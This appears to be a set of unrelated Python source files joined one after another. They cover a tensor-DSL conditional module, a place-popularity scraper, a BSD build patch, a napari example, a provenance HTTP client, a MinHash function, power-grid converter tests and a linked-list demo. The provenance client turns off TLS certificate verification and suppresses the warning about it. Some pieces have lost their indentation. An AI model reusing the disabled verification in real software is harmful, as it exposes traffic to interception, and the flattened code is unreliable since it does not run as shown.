    Clip ``input_tensor`` to a maximum value of 1::

        y = variable(0, input_tensor.dtype)
        y = input_tensor[some_index]
        with if_(y > 1):
            y <<= 1
        output_tensor[some_index] = y
    """
    return _If(condition)
class _If(_Expression):
    """
    The if expression; used as a context manager that closes itself with an
    _EndIf on exit.
    """
    def __init__(self, condition):
        if not issubclass(condition.__class__, Scalar):
            # a plain Python bool is a definition-time constant, so a Python
            # 'if' statement should be used instead
            if isinstance(condition, bool):
                raise TypeError('Attempting to use a constant boolean, %s, with the operator if_ expression. Use the '
                                'python if instead since this can be interpreted at operator '
                                'definition time.' % condition)
            raise TypeError('Condition must be a scalar expression, instead got: ' + str(condition))
        super(self.__class__, self).__init__(lang.IF)
        self.input_exprs = [condition]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _If from its protobuf representation."""
        return _If(input_exprs[0])

    def gen_c(self):
        """Emit the C if-header."""
        return 'if('+self.input_exprs[0].name+'){\n'

    def __enter__(self):
        pass

    def __exit__(self, exc_type, exc_val, exc_tb):
        # close the branch in the expression DAG
        _EndIf()
def elif_(condition):
    """
    Else-if conditional execution; must be used as part of a ``with`` block
    and must come directly after another if or else-if block.

    :param condition: the condition under which the body of the ``with``
        block executes
    :return: None

    :Example:

    Clip ``input_tensor`` to a maximum value of 1 and a minimum value of -1::

        y = variable(0, input_tensor.dtype)
        y = input_tensor[some_index]
        with if_(y > 1):
            y <<= 1
        with elif_(y <-1):
            y <<= -1
        output_tensor[some_index] = y
    """
    return _ElseIf(condition)
class _ElseIf(_Expression):
    """
    The elif expression; on entry it removes the preceding _EndIf so the
    generated C chains onto the previous branch.
    """
    def __init__(self, condition):
        if not issubclass(condition.__class__, Scalar):
            raise TypeError('Condition must be a scalar expression')
        super(self.__class__, self).__init__(lang.ELSEIF)
        self.input_exprs = [condition]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _ElseIf from its protobuf representation."""
        return _ElseIf(input_exprs[0])

    def gen_c(self):
        """Emit the closing brace of the previous branch plus the else-if header."""
        return '}\nelse if('+self.input_exprs[0].name+'){\n'

    def __enter__(self):
        # undo the _EndIf registered by the preceding if/elif block
        ExpressionDAG.remove_endif()

    def __exit__(self, exc_type, exc_val, exc_tb):
        _EndIf()
def else_():
    """
    Else conditional execution; must be used as part of a ``with`` block and
    must come directly after another if or else-if block.

    :Example:

    Clip ``input_tensor`` to a maximum value of 1 and a minimum value of -1,
    and zero it out if it is within that range::

        y = variable(0, input_tensor.dtype)
        with if_(y > 1):
            y <<= 1
        with elif_(y <-1):
            y <<= -1
        with else_():
            y <<= 0
        output_tensor[some_index] = y
    """
    return _Else()
class _Else(_Expression):
    """
    The else expression; on entry it removes the preceding _EndIf so the
    generated C chains onto the previous branch.
    """
    def __init__(self):
        super(self.__class__, self).__init__(lang.ELSE)
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _Else from its protobuf representation."""
        return _Else()

    def gen_c(self):
        """Emit the closing brace of the previous branch plus the else header."""
        return '}\nelse{\n'

    def __enter__(self):
        # undo the _EndIf registered by the preceding if/elif block
        ExpressionDAG.remove_endif()

    def __exit__(self, exc_type, exc_val, exc_tb):
        _EndIf()
class _EndIf(_Expression):
    """
    Marker expression closing an if/elif/else branch.
    """
    def __init__(self):
        super(self.__class__, self).__init__(lang.ENDIF)
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _EndIf from its protobuf representation."""
        return _EndIf()

    def gen_c(self):
        # closes the brace opened by _If/_ElseIf/_Else gen_c
        return '}\n'
|
import os
from datetime import datetime, timedelta
import pandas as pd
import populartimes
from apikeys import API_KEY
# Local hours (0-23) during which each place-type query is worth running;
# queries outside these windows are skipped.
HOURS_OF_INTEREST = {
    'restaurant': range(9, 23),
    'bar': list(range(12, 24)) + list(range(0, 4)),
    'club': list(range(20, 24)) + list(range(0, 6)),
    'train station': range(5, 21),
    'tourist information': range(8, 21),
    'sights': range(6, 21),
    'park': range(6, 21),
    'mall': range(6, 21),
    'supermarket': range(6, 21),
    'street market': range(6, 21),
    'hardware store': range(6, 21),
}
# output root; one subdirectory per UTC day is created below it
DATADIR = 'data/popularity'
# only query when the POI's local hour is a multiple of this (None disables)
EVERY_NTH_HOUR = 3  # None
# only query on these local weekdays (Monday=0); empty/None disables
ON_WEEKDAYS = (1, 3, 5)  # = Tue, Thu, Sat
#%%
# Places of interest with pre-resolved timezone offset columns
# (tz_rawoffset / tz_dstoffset in seconds).
pois = pd.read_csv('data/places_of_interest_tz.csv')  #.sample(20)
# one shared UTC timestamp for this run
utcnow = datetime.utcnow()
utcdate_ymd = utcnow.strftime('%Y-%m-%d')
utcweekday = utcnow.weekday()
utchour = utcnow.hour
# one output directory per UTC day
datadir_today = os.path.join(DATADIR, utcdate_ymd)
if not os.path.exists(datadir_today):
    print('creating directory', datadir_today, '\n')
    os.mkdir(datadir_today, mode=0o755)
#%%
resultrows = []
n_queries = 0
for poi_i, poirow in pois.iterrows():
    print('place of interest %d/%d: %s, %s' % (poi_i+1, len(pois), poirow.city, poirow.country))
    # convert the shared UTC timestamp to the POI's local time
    poi_tzoffset = timedelta(seconds=poirow.tz_rawoffset + poirow.tz_dstoffset)
    poi_localtime = utcnow + poi_tzoffset
    poi_localwd = poi_localtime.weekday()
    poi_localhour = poi_localtime.hour
    # throttle: only run on the configured local weekdays / every Nth local hour
    if ON_WEEKDAYS and poi_localwd not in ON_WEEKDAYS:
        print('skipping (local weekday is %d and will only run on weekdays %s)' % (poi_localwd, str(ON_WEEKDAYS)))
        continue
    if EVERY_NTH_HOUR and poi_localhour % EVERY_NTH_HOUR != 0:
        print('skipping (local hour %d and will only run every %d hour)' % (poi_localhour, EVERY_NTH_HOUR))
        continue
    # fall back to 06:00-20:00 for place types not listed in HOURS_OF_INTEREST
    poi_hinterest = HOURS_OF_INTEREST.get(poirow['query'], list(range(6, 21)))
    if not isinstance(poi_hinterest, list):
        poi_hinterest = list(poi_hinterest)
    if poi_localhour not in poi_hinterest:
        print('> skipping (local hour %d not in hours of interest %s)'
              % (poi_localhour, ', '.join(map(str, poi_hinterest))))
        continue
    try:
        n_queries += 1
        poptimes = populartimes.get_id(API_KEY, poirow.place_id)
    except Exception:  # catch any exception
        # NOTE(review): failures are silently collapsed to an empty result and
        # counted as a query; consider logging the exception for diagnostics.
        poptimes = {}
    if 'current_popularity' in poptimes and 'populartimes' in poptimes:
        print('> got popularity data')
        # record both the live popularity and the "usual" popularity for this
        # local weekday/hour
        resultrows.append([
            poirow.place_id,
            utcdate_ymd,
            utcweekday,
            utchour,
            poi_localtime.strftime('%Y-%m-%d'),
            poi_localwd,
            poi_localhour,
            poptimes['current_popularity'],
            poptimes['populartimes'][poi_localwd]['data'][poi_localhour]
        ])
    else:
        print('> failed to fetch popularity data')
    print('\n')
#%%
print('made %d queries and got %d results' % (n_queries, len(resultrows)))
if resultrows:
    popdata = pd.DataFrame(resultrows, columns=[
        'place_id',
        'utc_date', 'utc_weekday', 'utc_hour',
        'local_date', 'local_weekday', 'local_hour',
        'current_pop', 'usual_pop'
    ])
    # one CSV per UTC hour, e.g. 2020-01-01_h03.csv
    outfile = os.path.join(datadir_today, '%s_h%s.csv' % (utcdate_ymd, str(utchour).zfill(2)))
    print('saving data to file', outfile)
    popdata.to_csv(outfile, index=False)
else:
    print('nothing to save')
print('done.')
|
--- ffi/build.py.orig 2018-09-21 19:31:30 UTC
+++ ffi/build.py
@@ -155,7 +155,7 @@ def main():
main_win32()
elif sys.platform.startswith('linux'):
main_posix('linux', '.so')
- elif sys.platform.startswith(('freebsd','openbsd')):
+ elif sys.platform.startswith(('freebsd','openbsd', 'dragonfly')):
main_posix('freebsd', '.so')
elif sys.platform == 'darwin':
main_posix('osx', '.dylib')
|
"""
Display a labels layer above of an image layer using the add_labels and
add_image APIs
"""
from skimage import data
from skimage.color import rgb2gray
from skimage.segmentation import slic
import napari
with napari.gui_qt():
astro = data.astronaut()
# initialise viewer with astro image
viewer = napari.view(astronaut=rgb2gray(astro), multichannel=False)
viewer.layers[0].colormap = 'gray'
# add the labels
# we add 1 because SLIC returns labels from 0, which we consider background
labels = slic(astro, multichannel=True, compactness=20) + 1
label_layer = viewer.add_labels(labels, name='segmentation')
# Set the labels layer mode to picker with a string
label_layer.mode = 'picker'
print(f'The color of label 5 is {label_layer.get_color(5)}')
|
import traceback
from requests_futures.sessions import FuturesSession
from time import sleep
from urllib.parse import urljoin
import json
from requests.exceptions import ConnectionError
import urllib3
import logging
from typing import List
logger = logging.getLogger('PROV')
offline_prov_log = logging.getLogger("OFFLINE_PROV")
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class _ProvPersister:
    """Buffer provenance objects and ship them to a collector service.

    Retrospective (task/workflow) records are queued and flushed in bags of
    ``bag_size`` via asynchronous HTTP POSTs; prospective provenance is sent
    immediately. When ``online`` is False nothing is sent, but records may
    still be written to the offline provenance log.
    """

    def __init__(self, df_name: str, service_url: str = "http://localhost:5000", context: str = None,
                 with_validation: bool = False, db_name: str = None,
                 bag_size: int = 1, should_store_offline_log: bool = False, online: bool = True):
        """Set up service endpoints, the async HTTP session and the queue.

        Args:
            df_name: Name of the dataflow the provenance belongs to.
            service_url: Base URL of the provenance collector service.
            context: Optional context tag attached to every record.
            with_validation: Ask the server to validate submitted records.
            db_name: Target database name forwarded to the server.
            bag_size: Number of queued records that triggers a flush.
            should_store_offline_log: Also write records to the offline log.
            online: If False, never contact the service.
        """
        self.retrospective_url = urljoin(service_url, "retrospective-provenance")
        self.prospective_url = urljoin(service_url, "prospective-provenance")
        self.df_name = df_name
        self.context = context
        self.with_validation = with_validation
        self.db_name = db_name
        self.session = FuturesSession()
        self.requests_queue = list()
        self.bag_size = bag_size
        self.online = online
        self.should_store_offline_log = should_store_offline_log
        if self.online:
            logger.debug("You are using the Service URL: " + service_url)

    def close(self, wf_prov_obj: dict):
        """Drain in-flight requests, persist the workflow object, shut down."""
        while not self.session.executor._work_queue.empty():
            # wait to guarantee that all provenance requests have been sent to collector service
            sleep(0.1)
        self.persist_workflow(wf_prov_obj)
        # Persist remaining tasks synchronously
        self.__flush__(all_and_wait=True)
        self.session.close()

    def persist_task(self, prov_obj: dict):
        """Queue a task-level record; flush once the bag is full."""
        try:
            data = {
                "prov_obj": prov_obj,
                "dataflow_name": self.df_name,
                "act_type": "task"
            }
            if self.context:
                data["context"] = self.context
            self.requests_queue.append(data)
            if len(self.requests_queue) >= self.bag_size:
                self.__flush__()
        except Exception:
            logger.error("[Prov] Unexpected exception")
            traceback.print_exc()
            pass

    def persist_workflow(self, prov_obj: dict):
        """Queue a workflow-level record.

        Objects carrying a ``configuration`` key are flushed synchronously
        right away.
        """
        try:
            data = {
                "prov_obj": prov_obj,
                "dataflow_name": self.df_name,
                "act_type": "workflow"
            }
            if self.context:
                data["context"] = self.context
            self.requests_queue.append(data)
            # if `configuration` is present this object should be persisted synchronously
            if "configuration" in prov_obj:
                self.__flush__(True)
        except Exception:
            logger.error("[Prov] Unexpected exception")
            traceback.print_exc()
            pass

    def __flush__(self, all_and_wait: bool = False):
        """Send queued records: everything (``all_and_wait``) or one bag."""
        if len(self.requests_queue) > 0:
            if all_and_wait:
                logger.debug("Going to flush everything. Flushing " + str(len(self.requests_queue)))
                if self.should_store_offline_log:
                    offline_prov_log.debug(json.dumps(self.requests_queue))
                if self.online:
                    self.__persist_online__(self.requests_queue)
                self.requests_queue = list()
            else:
                to_flush = self.requests_queue[:self.bag_size]
                # BUGFIX: capture the total before deleting so the message
                # reads "X out of <total>", not "X out of <remaining>".
                total_queued = len(self.requests_queue)
                del self.requests_queue[:self.bag_size]
                logger.debug("Going to flush a part. Flushing " + str(len(to_flush)) + " out of " +
                             str(total_queued))
                if self.should_store_offline_log:
                    offline_prov_log.debug(json.dumps(to_flush))
                if self.online:
                    self.__persist_online__(to_flush)

    def __persist_online__(self, to_flush: List[dict]):
        """POST a bag of retrospective records to the collector service."""
        params = {"with_validation": str(self.with_validation), "db_name": self.db_name}
        try:
            logger.debug("[Prov-Persistence]" + json.dumps(to_flush))
            r = self.session.post(self.retrospective_url, json=to_flush, params=params, verify=False).result()
        except ConnectionError as ex:
            logger.error(
                "[Prov][ConnectionError] There is a communication error between client and server -> " + str(ex))
            r = None
            pass
        except Exception as ex:
            traceback.print_exc()
            logger.error(
                "[Prov] Unexpected exception while adding retrospective provenance: " + type(ex).__name__
                + "->" + str(ex))
            r = None
            pass
        # If requests were validated, check for errors
        if r and self.with_validation:
            self.__log_validation_msg__(r)

    def persist_prospective(self, json_data: dict):
        """Send prospective provenance synchronously, overwriting on the server."""
        try:
            if self.should_store_offline_log:
                # BUGFIX: log the prospective payload itself; previously the
                # retrospective requests_queue was logged here by mistake.
                offline_prov_log.debug(json.dumps(json_data))
            if self.online:
                logger.debug("[Prov-Persistence][Prospective]" + json.dumps(json_data))
                try:
                    r = self.session.post(self.prospective_url, json=json_data, params={'overwrite': True},
                                          verify=False).result()
                    if 200 <= r.status_code <= 209:
                        logger.debug("Prospective provenance inserted successfully.")
                    elif r.status_code == 406:
                        error_parsed = json.loads(r._content.decode('utf-8'))
                        error_obj = error_parsed['error'].replace("'", '"')
                        logger.error(error_obj)
                    elif r.status_code == 500:
                        # Server-side failure on POST: retry once with PUT.
                        r = self.session.put(self.prospective_url, json=json_data).result()
                        try:
                            assert 200 <= r.status_code <= 209
                        except AssertionError:
                            logger.error("Prospective provenance was not inserted correctly. Status code = " + str(r.status_code))
                    elif r.status_code > 300:
                        logger.error("Prospective provenance was not inserted correctly. Status code = " + str(r.status_code))
                except ConnectionError as ex:
                    traceback.print_exc()
                    logger.error("[Prov][ConnectionError] There is a communication error between client and server -> " + str(
                        ex))
                    pass
                except Exception as ex:
                    logger.error("[Prov] Unexpected exception while adding prospective provenance: " + type(ex).__name__)
                    pass
        except Exception as ex:
            logger.error("[Prov] Unexpected exception " + type(ex).__name__)
            traceback.print_exc()
            pass

    @staticmethod
    def __log_validation_msg__(response):
        """Log server validation results: 'W…' codes as warnings, rest as errors."""
        error_obj = json.loads(response._content.decode('utf-8'))
        if len(error_obj['error']) > 0:
            for error_list in error_obj['error']:
                for error in error_list:
                    if error['code'][0] == 'W':
                        logger.warning('{} {}{}'.format(error['type'], error['explanation'], '\n'))
                    else:
                        logger.error('{} {}{}'.format(error['type'], error['explanation'], '\n'))
|
try:
from urllib.request import urlopen # Python 3
except ImportError:
from urllib2 import urlopen # Python 2
import os
import re
import tempfile
from contextlib import contextmanager
import six
URL_REGEX = re.compile(r'http://|https://|ftp://|file://|file:\\')
def is_url(filename):
    """Return True if string is an http or ftp path."""
    if not isinstance(filename, six.string_types):
        return False
    return URL_REGEX.match(filename) is not None
@contextmanager
def file_or_url_context(resource_name):
    """Yield name of file from the given resource (i.e. file or url).

    URLs are downloaded to a named temporary file which is removed when the
    context exits; local paths are yielded unchanged.
    """
    if is_url(resource_name):
        # Keep the original extension so downstream readers can sniff format.
        _, ext = os.path.splitext(resource_name)
        # Open the URL *before* creating the temp file: a download failure
        # previously left `f` unbound and raised NameError in the finally
        # clause, masking the real error (and could leak the temp file).
        u = urlopen(resource_name)
        f = tempfile.NamedTemporaryFile(delete=False, suffix=ext)
        try:
            with f:
                f.write(u.read())
            # f must be closed before yielding
            yield f.name
        finally:
            os.remove(f.name)
    else:
        yield resource_name
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 by University of Kassel, Tu Dortmund, RWTH Aachen University and Fraunhofer
# Institute for Energy Economics and Energy System Technology (IEE) Kassel and individual
# contributors (see AUTHORS file for details). All rights reserved.
import pytest
import os
from copy import deepcopy
import numpy as np
import pandas as pd
import pandapower as pp
from pandapower.networks import example_simple
from simbench import sb_dir
from simbench.converter import csv2pp, csv_data2pp, pp2csv, pp2csv_data, \
convert_parallel_branches, read_csv_data, ensure_full_column_data_existence, \
avoid_duplicates_in_column, merge_busbar_coordinates
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
simbench_converter_test_path = os.path.join(sb_dir, "test", "converter")
test_network_path = os.path.join(simbench_converter_test_path, "test_network")
test_output_folder_path = os.path.join(simbench_converter_test_path, "test_network_output_folder")
__author__ = 'smeinecke'
def test_convert_to_parallel_branches():
    """Check that duplicate trafos/lines are folded into `parallel` counts.

    Builds one trafo and one line eight/nine times with controlled variations
    (name, loading limit, switch state, std_type, extra switch, parallel,
    direction) and verifies which variants convert_parallel_branches merges.
    """
    # create test grid
    net = pp.create_empty_network()
    pp.create_bus(net, 110)
    pp.create_buses(net, 2, 20)
    # --- transformers & corresponding switches
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1")
    pp.create_switch(net, 1, 0, "t", name="Tr-Switch 1")
    # only name changed:
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 2")
    pp.create_switch(net, 1, 1, "t", name="Tr-Switch 2")
    # only max_loading changed:
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1", max_loading_percent=50)
    pp.create_switch(net, 1, 2, "t", name="Tr-Switch 1")
    # only switch position changed:
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1")
    pp.create_switch(net, 1, 3, "t", closed=False, name="Tr-Switch 1")
    # only switch missing:
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1")
    # only name and std_type changed:
    pp.create_transformer(net, 0, 1, "25 MVA 110/20 kV", name="Trafo 3")
    pp.create_switch(net, 1, 5, "t", name="Tr-Switch 3")
    # only name changed and switch added:
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 4")
    pp.create_switch(net, 1, 6, "t", name="Tr-Switch 4a")
    pp.create_switch(net, 0, 6, "t", name="Tr-Switch 4b")
    # only name and parallel changed:
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 5", parallel=2)
    pp.create_switch(net, 1, 7, "t", name="Tr-Switch 5")
    # --- lines & corresponding switches
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1")
    pp.create_switch(net, 2, 0, "l", name="L-Switch 1")
    # only name changed:
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 2")
    pp.create_switch(net, 2, 1, "l", name="L-Switch 2")
    # only max_loading changed:
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1", max_loading_percent=50)
    pp.create_switch(net, 2, 2, "l", name="L-Switch 1")
    # only switch position changed:
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1")
    pp.create_switch(net, 2, 3, "l", closed=False, name="L-Switch 1")
    # only switch missing:
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1")
    # only name and std_type changed:
    pp.create_line(net, 1, 2, 1.11, "48-AL1/8-ST1A 20.0", name="Line 3")
    pp.create_switch(net, 2, 5, "l", name="L-Switch 3")
    # only name changed and switch added:
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 4")
    pp.create_switch(net, 2, 6, "l", name="L-Switch 4a")
    pp.create_switch(net, 1, 6, "l", name="L-Switch 4b")
    # only name and parallel changed:
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 5", parallel=2)
    pp.create_switch(net, 2, 7, "l", name="L-Switch 5")
    # only name and from_bus <-> to_bus changed:
    pp.create_line(net, 2, 1, 1.11, "94-AL1/15-ST1A 20.0", name="Line 6")
    pp.create_switch(net, 2, 8, "l", name="L-Switch 6")
    # Three copies so each conversion variant starts from the same grid.
    net1 = deepcopy(net)
    net2 = deepcopy(net)
    net3 = deepcopy(net)
    # complete
    convert_parallel_branches(net1, multiple_entries=False)
    for elm in ["trafo", "line"]:
        assert sorted(net1[elm].index) == [0, 2, 3, 4, 5, 6]
    assert list(net1["trafo"].parallel.values) == [4] + [1]*5
    assert list(net1["line"].parallel.values) == [5] + [1]*5
    # only line
    convert_parallel_branches(net2, multiple_entries=False, elm_to_convert=["line"])
    assert pp.dataframes_equal(net2.line, net1.line)
    assert pp.dataframes_equal(net2.trafo, net.trafo)
    # only exclude "max_loading_percent"
    convert_parallel_branches(net3, multiple_entries=False, exclude_cols_from_parallel_finding=[
        "name", "parallel", "max_loading_percent"])
    for elm in ["trafo", "line"]:
        assert sorted(net3[elm].index) == [0, 3, 4, 5, 6]
    assert list(net3["trafo"].parallel.values) == [5] + [1]*4
    assert list(net3["line"].parallel.values) == [6] + [1]*4
def test_convert_parallel_branches():
    """Round-trip: expand `parallel` branches into multiple entries and back.

    Verifies element counts after expansion (multiple_entries default) and
    after re-merging, including the case where one expanded switch is opened
    so its branch can no longer be merged.
    """
    # create test grid
    net = pp.create_empty_network()
    pp.create_bus(net, 110)
    pp.create_buses(net, 4, 20)
    pp.create_ext_grid(net, 0)
    pp.create_load(net, 4, 1e3, 4e2)
    pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="sd", parallel=3)
    pp.create_switch(net, 1, 0, "t", name="dfjk")
    pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="sdh", parallel=2)
    pp.create_switch(net, 2, 0, "l", name="dfsdf")
    pp.create_line(net, 2, 3, 1.11, "94-AL1/15-ST1A 20.0", name="swed", parallel=1)
    pp.create_line(net, 3, 4, 1.11, "94-AL1/15-ST1A 20.0", name="sdhj", parallel=3)
    pp.create_switch(net, 3, 2, "l", name="dfdfg")
    pp.create_switch(net, 4, 2, "l", False, name="dfhgj")
    # check test grid
    assert net.trafo.shape[0] == 1
    assert net.line.shape[0] == 3
    assert net.switch.shape[0] == 4
    convert_parallel_branches(net)
    # test parallelisation
    assert net.trafo.shape[0] == 3
    assert net.line.shape[0] == 6
    assert net.switch.shape[0] == 11
    net1 = deepcopy(net)
    # NOTE(review): chained indexing (`.closed.loc[4]`) may not write through
    # on newer pandas — confirm this still mutates net1.switch.
    net1.switch.closed.loc[4] = False
    convert_parallel_branches(net, multiple_entries=False)
    convert_parallel_branches(net1, multiple_entries=False)
    # test sum up of parallels
    assert net.trafo.shape[0] == 1
    assert net.line.shape[0] == 3
    assert net.switch.shape[0] == 4
    assert net1.trafo.shape[0] == 1
    assert net1.line.shape[0] == 4
    assert net1.switch.shape[0] == 5
def test_test_network():
    """Convert the test network csv -> pandapower -> csv and compare tables.

    Also sanity-checks that min_p/q limits never exceed the corresponding
    max limits for all node elements.
    """
    net = csv2pp(test_network_path, no_generic_coord=True)
    # test min/max ratio
    for elm in pp.pp_elements(bus=False, branch_elements=False, other_elements=False):
        if "min_p_mw" in net[elm].columns and "max_p_mw" in net[elm].columns:
            # NOTE(review): positional `any(1)` (axis=1) is deprecated in
            # recent pandas — confirm `.any(axis=1)` is intended.
            isnull = net[elm][["min_p_mw", "max_p_mw"]].isnull().any(1)
            assert (net[elm].min_p_mw[~isnull] <= net[elm].max_p_mw[~isnull]).all()
        if "min_q_mvar" in net[elm].columns and "max_q_mvar" in net[elm].columns:
            isnull = net[elm][["min_q_mvar", "max_q_mvar"]].isnull().any(1)
            assert (net[elm].min_q_mvar[~isnull] <= net[elm].max_q_mvar[~isnull]).all()
    pp2csv(net, test_output_folder_path, export_pp_std_types=False, drop_inactive_elements=False)
    # --- test equality of exported csv data and given csv data
    csv_orig = read_csv_data(test_network_path, ";")
    csv_exported = read_csv_data(test_output_folder_path, ";")
    all_eq = True
    for tablename in csv_orig.keys():
        try:
            eq = pp.dataframes_equal(csv_orig[tablename], csv_exported[tablename], tol=1e-7)
            if not eq:
                # Dump heads and dtypes to make the diff diagnosable in CI logs.
                logger.error("csv_orig['%s'] and csv_exported['%s'] differ." % (tablename,
                                                                                tablename))
                logger.error(csv_orig[tablename].head())
                logger.error(csv_exported[tablename].head())
                logger.error(csv_orig[tablename].dtypes)
                logger.error(csv_exported[tablename].dtypes)
        except ValueError:
            eq = False
            logger.error("dataframes_equal did not work for %s." % tablename)
        all_eq &= eq
    assert all_eq
def test_example_simple():
    """Round-trip pandapower's example_simple net through csv data.

    Augments the example net with measurements, storage, dcline, geodata and
    an unsupplied bus, converts pp -> csv -> pp, then compares nets after
    normalising the known, intended differences.
    """
    net = example_simple()
    # --- fix scaling
    net.load["scaling"] = 1.
    # --- add some additional data
    net.bus["subnet"] = ["net%i" % i for i in net.bus.index]
    pp.create_measurement(net, "i", "trafo", np.nan, np.nan, 0, "hv", name="1")
    pp.create_measurement(net, "i", "line", np.nan, np.nan, 1, "to", name="2")
    pp.create_measurement(net, "v", "bus", np.nan, np.nan, 0, name="3")
    net.shunt["max_step"] = np.nan
    stor = pp.create_storage(net, 6, 0.01, 0.1, -0.002, 0.05, 80, name="sda", min_p_mw=-0.01,
                             max_p_mw=0.008, min_q_mvar=-0.01, max_q_mvar=0.005)
    net.storage.loc[stor, "efficiency_percent"] = 90
    net.storage.loc[stor, "self-discharge_percent_per_day"] = 0.3
    pp.create_dcline(net, 4, 6, 0.01, 0.1, 1e-3, 1.0, 1.01, name="df", min_q_from_mvar=-0.01)
    pp.runpp(net)
    # Bus that will be dropped by drop_inactive_elements during conversion.
    to_drop = pp.create_bus(net, 7, "to_drop")
    # --- add names to elements
    for i in pp.pp_elements():
        net[i] = ensure_full_column_data_existence(net, i, 'name')
        avoid_duplicates_in_column(net, i, 'name')
    # --- create geodata
    net.bus_geodata["x"] = [0, 1, 2, 3, 4, 5, 5, 3.63]
    net.bus_geodata["y"] = [0]*5+[-5, 5, 2.33]
    merge_busbar_coordinates(net)
    # --- convert
    csv_data = pp2csv_data(net, export_pp_std_types=True, drop_inactive_elements=True)
    net_from_csv_data = csv_data2pp(csv_data)
    # --- adjust net appearance
    pp.drop_buses(net, [to_drop])
    del net["OPF_converged"]
    net.load["type"] = np.nan
    del net_from_csv_data["substation"]
    del net_from_csv_data["profiles"]
    for key in net.keys():
        if isinstance(net[key], pd.DataFrame):
            # drop unequal columns
            dummy_columns = net[key].columns
            extra_columns = net_from_csv_data[key].columns.difference(dummy_columns)
            net_from_csv_data[key].drop(columns=extra_columns, inplace=True)
            # drop result table rows
            if "res_" in key:
                if not key == "res_bus":
                    net[key].drop(net[key].index, inplace=True)
                else:
                    net[key].loc[:, ["p_mw", "q_mvar"]] = np.nan
            # adjust dtypes
            if net[key].shape[0]:
                try:
                    net_from_csv_data[key] = net_from_csv_data[key].astype(dtype=dict(net[
                        key].dtypes))
                # NOTE(review): bare except silently downgrades cast failures
                # to a log line — consider `except Exception`.
                except:
                    logger.error("dtype adjustment of %s failed." % key)
    eq = pp.nets_equal(net, net_from_csv_data, tol=1e-7)
    assert eq
if __name__ == "__main__":
if 0:
pytest.main([__file__, "-xs"])
else:
test_convert_to_parallel_branches()
test_convert_parallel_branches()
test_test_network()
test_example_simple()
pass
|
""" MinHash Module
"""
from utils import *
import math
def minhash(rmat, num_shingles, num_signatures):
    """ Apply Min Hash per document

    Args:
        rmat: pyspark.rdd of (key, iterable-of-rating-indexes) pairs.
        num_shingles: size of the hash value space.
        num_signatures: number of hash functions, i.e. signature length.

    Return:
    -----
    pyspark.rdd
        [("business_id", {rating indexes}),..] -> i.e. [("ieuhg", {2, 3}]
    """
    # Get hash functions
    hash_fns = get_hash_family(num_signatures, num_shingles)

    # Apply minhash: one signature entry per hash function.
    def apply_mh(rs):
        # min() over a generator replaces the manual tracking loop;
        # default=math.inf preserves the original result when rs is empty.
        return [min((h(r) for r in rs), default=math.inf) for h in hash_fns]

    # Apply minhash over matrix
    return rmat.mapValues(apply_mh)
|
# python 3.5.2
# Banner for the linked-list demo below.
print('Linked List (Unorder List)')
print('-' * 20)
class Node:
    """A single element of a singly linked list.

    Holds a payload (``dataNode``) and a reference to the next node
    (``nextNode``); both are also accessed directly by LinkedList.
    """
    def __init__(self, data=None):
        self.dataNode = data   # payload stored in this node
        self.nextNode = None   # successor node, or None at the tail
    def getData(self):
        """Return the payload stored in this node."""
        return self.dataNode
    def setData(self, data=None):
        """Replace the payload stored in this node."""
        self.dataNode = data
    def getNext(self):
        """Return the successor node (None if this is the tail)."""
        return self.nextNode
    def setNext(self, next=None):
        """Set the successor node. (`next` shadows the builtin.)"""
        self.nextNode = next
class LinkedList:
    """A minimal singly linked list with append, display and length."""
    def __init__(self):
        self.head = None   # first node, or None when empty
        self.count = 0     # number of appended elements
    def printRow(self, pointer):
        """Print one node's payload and its successor reference."""
        print('DATA: ', pointer.getData(), ' NEXT NODE: ', pointer.getNext() )
    def append(self, data=None):
        """Append `data` at the tail (O(n) traversal to find the tail)."""
        temp = Node(data)
        self.count = self.count + 1
        if self.head == None:
            self.head = temp
        else:
            pointer = self.head
            while pointer.getNext() != None:
                pointer = pointer.getNext()
            pointer.nextNode = temp
    def showLinkedList(self):
        """Print every node in order; prints nothing for an empty list."""
        pointer = self.head
        if pointer is None:
            # BUGFIX: an empty list previously crashed with AttributeError
            # on pointer.getNext().
            return
        while pointer.getNext() != None:
            self.printRow(pointer)
            pointer = pointer.getNext()
        self.printRow(pointer)
    def len(self):
        """Return the number of elements appended so far."""
        return self.count
# Build a demo list from sample values and show its contents and length.
link = LinkedList()
for value in (51, 23, 91, 12, 32):
    link.append(value)
link.showLinkedList()
print('-' * 20)
print('Length: ', link.len())
print('-' * 20)
'''
OUTPUT:
Linked List (Unorder List)
--------------------
DATA: 51 NEXT NODE: <__main__.Node object at 0x7fc19d92eb38>
DATA: 23 NEXT NODE: <__main__.Node object at 0x7fc19d92eb70>
DATA: 91 NEXT NODE: <__main__.Node object at 0x7fc19d92eba8>
